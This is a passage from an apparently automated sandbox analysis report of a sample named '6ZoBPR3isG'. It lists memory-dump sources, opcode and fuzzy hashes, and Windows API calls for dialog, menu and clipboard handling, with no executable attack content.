                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8e06804adca9f08db4cf616b44440c975e9791548caed33e2e15666ad71352da
                                                                                                              • Instruction ID: dcc4605a9fb08d3f6f0d8058c25a011a6767d4d82b0adad21afd5559af50e804
                                                                                                              • Opcode Fuzzy Hash: 8e06804adca9f08db4cf616b44440c975e9791548caed33e2e15666ad71352da
                                                                                                              • Instruction Fuzzy Hash: 6BC19E74E00218CFEB54DFA5D954B9DBBB2AF89304F2080A9D409BB395DB359A85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3f69bad98ac21c89c9abc355cd342e9ccd7dafa0323bad3d24d5a5b4a04795da
                                                                                                              • Instruction ID: 7f62a1139ccf3eade195436155b39268749d3d37ad94e1b8bc0b6c53a9909e84
                                                                                                              • Opcode Fuzzy Hash: 3f69bad98ac21c89c9abc355cd342e9ccd7dafa0323bad3d24d5a5b4a04795da
                                                                                                              • Instruction Fuzzy Hash: 12C18D74E00218CFEB14DFA5D994BDDBBF2AF89304F2080A9D409AB395DB359A85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b13fad9439e09453193d5fc92bea31d6ac457fea54e2ee5767ea3ba32667c83
                                                                                                              • Instruction ID: b580e073da278f86db276af80ca4305cec79582bbd0682eb2103ba4511675920
                                                                                                              • Opcode Fuzzy Hash: 8b13fad9439e09453193d5fc92bea31d6ac457fea54e2ee5767ea3ba32667c83
                                                                                                              • Instruction Fuzzy Hash: 0FC19F74E00218CFEB54DFA5D994B9DBBF2AF89304F2080A9D409BB395DB359A85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7fbea1f9bf8270cd43ba46f78ba960572ee69bb8f9ef63c345d4c99aa54a1c43
                                                                                                              • Instruction ID: 2a4c81346b7310560eb34dcd9c1e2b0f43968e34433f91c7d47df6c8863ab50a
                                                                                                              • Opcode Fuzzy Hash: 7fbea1f9bf8270cd43ba46f78ba960572ee69bb8f9ef63c345d4c99aa54a1c43
                                                                                                              • Instruction Fuzzy Hash: 5CC18D74E00218CFEB14DFA5D994B9DBBF2BF89304F2081A9D409AB395DB359A85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b4385c8f646d235e28e20e25bed4ff912706d050c64461e2ada9e1ae9959aece
                                                                                                              • Instruction ID: 9d231ad129de96779cb14e2567ff22920cf7158e81b230ac6c9d1c90167db07e
                                                                                                              • Opcode Fuzzy Hash: b4385c8f646d235e28e20e25bed4ff912706d050c64461e2ada9e1ae9959aece
                                                                                                              • Instruction Fuzzy Hash: 65C19C74E00218CFEB14DFA5D994B9DBBF2AF89304F2084A9D409BB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3b09d1de315754bc6d5ee0c2ad993019d34dd88d014bb087849ba2d1d25e6eab
                                                                                                              • Instruction ID: 62d910531e6ff01ff5627c68fae6083142e200ebe5f25fbca619127d8935548a
                                                                                                              • Opcode Fuzzy Hash: 3b09d1de315754bc6d5ee0c2ad993019d34dd88d014bb087849ba2d1d25e6eab
                                                                                                              • Instruction Fuzzy Hash: 54C19E74E00218CFEB54DFA5D994BADBBB2BF89304F1081A9D409AB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 026216dfb60509c30b8c0c99fd2bf92f63f2fcd5c58d17e7ce47f8936b2b9043
                                                                                                              • Instruction ID: e566695fd049da6d337dcda93baa423d3d34c64f577ca00633a887d6d57e4913
                                                                                                              • Opcode Fuzzy Hash: 026216dfb60509c30b8c0c99fd2bf92f63f2fcd5c58d17e7ce47f8936b2b9043
                                                                                                              • Instruction Fuzzy Hash: 95C19E74E00218CFEB14DFA5D994B9DBBB2BF89304F1081A9D409BB395DB359A85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3f210a82e85adc8a0a01e1a2b9cf36396995d6ef04fc3787513f2b79ddd0f29e
                                                                                                              • Instruction ID: 6589394c8820785ed973c44fa3735e29396734c0d7938ac57ebf34b616285229
                                                                                                              • Opcode Fuzzy Hash: 3f210a82e85adc8a0a01e1a2b9cf36396995d6ef04fc3787513f2b79ddd0f29e
                                                                                                              • Instruction Fuzzy Hash: 3EC1A074E04218CFEB54DFA5D954B9DBBB2BF89300F1081A9D809BB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9b11c474e74b17a871f988a3678efecb7fc82cdc61de43e48de99dc8144a129f
                                                                                                              • Instruction ID: c8d94db0355548c8c7f59d39951d2e749cb6ea43b178e5d3997b26625457cc99
                                                                                                              • Opcode Fuzzy Hash: 9b11c474e74b17a871f988a3678efecb7fc82cdc61de43e48de99dc8144a129f
                                                                                                              • Instruction Fuzzy Hash: DDC19E74E00218CFEB54DFA5D994BADBBB2BF89304F1081A9D409BB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6bcb04c4967ac355269a1f588fb812c5add8f19736c1ba0b8df06059882533cd
                                                                                                              • Instruction ID: 083eab605f20d11beac381cf0e8f8016bbbfdeb04456e113bf667a826440fe48
                                                                                                              • Opcode Fuzzy Hash: 6bcb04c4967ac355269a1f588fb812c5add8f19736c1ba0b8df06059882533cd
                                                                                                              • Instruction Fuzzy Hash: 38C19F74E00218CFEB54DFA5D954BADBBB2BF89304F1081A9D409BB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 03e5e2104dd87a8c73cc9764b649c72860e93fdd9b593b58b908618da66fdd39
                                                                                                              • Instruction ID: d27e594f6ef0c183d393fe79c2e8b98c93d8c9a648c064a88eee28bfd216a9c0
                                                                                                              • Opcode Fuzzy Hash: 03e5e2104dd87a8c73cc9764b649c72860e93fdd9b593b58b908618da66fdd39
                                                                                                              • Instruction Fuzzy Hash: 01C19F74E00218CFEB54DFA5D994B9DBBB2BF89304F2081A9D409AB395DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9ba8771f4568fe56b0a5abbbc20ad087925d981db65f80ebaefd2c3cbf172b32
                                                                                                              • Instruction ID: 4744f809c258f276ba400a5ef3060a0200bb8169fb5d81978fd147f1fa2b9681
                                                                                                              • Opcode Fuzzy Hash: 9ba8771f4568fe56b0a5abbbc20ad087925d981db65f80ebaefd2c3cbf172b32
                                                                                                              • Instruction Fuzzy Hash: BFC19F74E00218CFEB14DFA5D954BADBBB2BF89304F1081A9D409AB395DB359E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4209a963ec822ac0ba5f753ca475521d71df11630341c0d3a452b479ce119af8
                                                                                                              • Instruction ID: de8bd8cd40c0943bc1a5fb9d975caf03cc720951f148ed3c5aa22ec58247a810
                                                                                                              • Opcode Fuzzy Hash: 4209a963ec822ac0ba5f753ca475521d71df11630341c0d3a452b479ce119af8
                                                                                                              • Instruction Fuzzy Hash: A3C18F74E00218CFEB54DFA5D954B9DBBB2AF89304F2081A9D409BB395DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fdfc63d235a92d4d5ff5cd2bf04669e31f1d3d3591491381956ee32125b60485
                                                                                                              • Instruction ID: 7e4931998c1dea30482a8e054f00213ef7d4519eaa27d00f589e25311f14f6ff
                                                                                                              • Opcode Fuzzy Hash: fdfc63d235a92d4d5ff5cd2bf04669e31f1d3d3591491381956ee32125b60485
                                                                                                              • Instruction Fuzzy Hash: 83C18F74E00218CFEB54DFA5D954BADBBB2BF89304F1081A9D409BB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c86e429ffd0f8aff6cb1cc15572221f037ee654b6827fe135a50e1b2b2bb7eb1
                                                                                                              • Instruction ID: a71aaaebf34cc56597cf88812239008c9b76d4c56a4654836bdf4039785493bb
                                                                                                              • Opcode Fuzzy Hash: c86e429ffd0f8aff6cb1cc15572221f037ee654b6827fe135a50e1b2b2bb7eb1
                                                                                                              • Instruction Fuzzy Hash: F5C19F74E00218CFEB54DFA5D994B9DBBB2BF89304F1081A9D409BB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c716370eb0758a08d8bab2f4c39523ab5b5669afa07fa91c0fb4c9fc44eb598
                                                                                                              • Instruction ID: 9aa2bf5aa084b2af8381b8af3ce8295a637117c650c5b2dd1636108dcb031a14
                                                                                                              • Opcode Fuzzy Hash: 6c716370eb0758a08d8bab2f4c39523ab5b5669afa07fa91c0fb4c9fc44eb598
                                                                                                              • Instruction Fuzzy Hash: 73C19074E00218CFEB54DFA5D994B9DBBB2BF89304F2081A9D409BB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ddac5fad8788760dbda18b1518f94f81f4163c1ded13cabb57465c4275a2de4f
                                                                                                              • Instruction ID: 9b35e8d36e4b6204c7c69d840ff5bb7b521182089f0f921167414db8db49c2a9
                                                                                                              • Opcode Fuzzy Hash: ddac5fad8788760dbda18b1518f94f81f4163c1ded13cabb57465c4275a2de4f
                                                                                                              • Instruction Fuzzy Hash: 42C18E74E00218CFEB54DFA5D994B9DBBB2BF89304F2081A9D409BB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bfa00382f589850c7dac0d8c02fb2972b3f932285306129f1a022055ad2768d
                                                                                                              • Instruction ID: 6b4a4f75bf23c714e85ee56a6bbbb08212cbf09e0ee3478100fd4ab4ab11e0eb
                                                                                                              • Opcode Fuzzy Hash: 4bfa00382f589850c7dac0d8c02fb2972b3f932285306129f1a022055ad2768d
                                                                                                              • Instruction Fuzzy Hash: 28C19F74E00218CFEB54DFA5D954BADBBB2BF89304F1081A9D409AB395DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f0ae30a8ebf55991ce316092d0dcd53687ac3b706e7825eadf09770c0d58fd59
                                                                                                              • Instruction ID: bda4d2b08babb30f22c714b837cb33fe32c870959ddf0017c8919ebef7873260
                                                                                                              • Opcode Fuzzy Hash: f0ae30a8ebf55991ce316092d0dcd53687ac3b706e7825eadf09770c0d58fd59
                                                                                                              • Instruction Fuzzy Hash: 6BC18E74E00218CFEB14DFA5D994B9DBBB2BF89304F1081A9D409BB395DB359A85CF11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ed456c42ce060aee5143996b3e95e1b3f902339a6da519d3e096552afd2435b2
                                                                                                              • Instruction ID: 7d359249b93c77f0d1b966d349aee9950bba72c001a45f77d6cedec6dbad36e2
                                                                                                              • Opcode Fuzzy Hash: ed456c42ce060aee5143996b3e95e1b3f902339a6da519d3e096552afd2435b2
                                                                                                              • Instruction Fuzzy Hash: 98C19E74E00218CFEB54DFA5D994B9DBBB2BF89304F2081A9D409AB395DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8c87c8d3f962d74e69d04713cafcf82e8642f532d97bbaf7cd7b188e0190f005
                                                                                                              • Instruction ID: 34c41892d66017f98e15f7543ce68485c4c9da2eb330ff5e9d71072dbb8c6b5a
                                                                                                              • Opcode Fuzzy Hash: 8c87c8d3f962d74e69d04713cafcf82e8642f532d97bbaf7cd7b188e0190f005
                                                                                                              • Instruction Fuzzy Hash: 80A19D74A05228CFEB65DF24C894BD9B7B2BB8A301F5085EAD80DA7350DB319E81DF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2d7d9dc57c9505eab3bfbad0eb7bdb9d80d8ad5beed5ec096b6d4f933358c8cf
                                                                                                              • Instruction ID: bdefe2a088f554812b777f7d22dc56a64068017c68d3c532f0a545f5df01e8a1
                                                                                                              • Opcode Fuzzy Hash: 2d7d9dc57c9505eab3bfbad0eb7bdb9d80d8ad5beed5ec096b6d4f933358c8cf
                                                                                                              • Instruction Fuzzy Hash: 82519274A05228CFDB65DF24D894BA9B7B2BF4A301F5085EAD809B7350DB329E81CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b63d4e4665e1b634568f4c9a4c0fd6318ebb62837d778966a9b2674935b64e4
                                                                                                              • Instruction ID: fa0ac2b53079376f27f5d229723b72839be20f5def6fce12fadcb0b409ef44f2
                                                                                                              • Opcode Fuzzy Hash: 8b63d4e4665e1b634568f4c9a4c0fd6318ebb62837d778966a9b2674935b64e4
                                                                                                              • Instruction Fuzzy Hash: 0CD06C79E442188BCB219FA4A8407ECF7B0AB9A321F0024A6C558A7250DB709A948E96
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 427f2796dd564dc89ae574d110b52c456e28025ace0267855d9cf5269b6c1444
                                                                                                              • Instruction ID: 4a335d2090237035d24a9d9c89f12ed1147e6a25669735a14d10b3efa5e4ec0b
                                                                                                              • Opcode Fuzzy Hash: 427f2796dd564dc89ae574d110b52c456e28025ace0267855d9cf5269b6c1444
                                                                                                              • Instruction Fuzzy Hash: 21D06C75D442288BCB21EFA498447ECB3B1BB9A310F0125A6C548A7260DB709EA48A56
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                              • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                              • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                              • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                              • EmptyClipboard.USER32 ref: 004058B7
                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                              • CloseClipboard.USER32 ref: 00405912
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID: (7B${
                                                                                                              • API String ID: 590372296-525222780
                                                                                                              • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                              • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                              • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                              • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                              • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                              • DestroyWindow.USER32 ref: 00403EF3
                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403FF9
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                              • SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                              • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                              • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                              • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                              • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2616470255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2616449737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616497398.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616519255.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                              • String ID: (7B
                                                                                                              • API String ID: 184305955-3251261122
                                                                                                              • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                              • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                              • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                              • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                              APIs
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
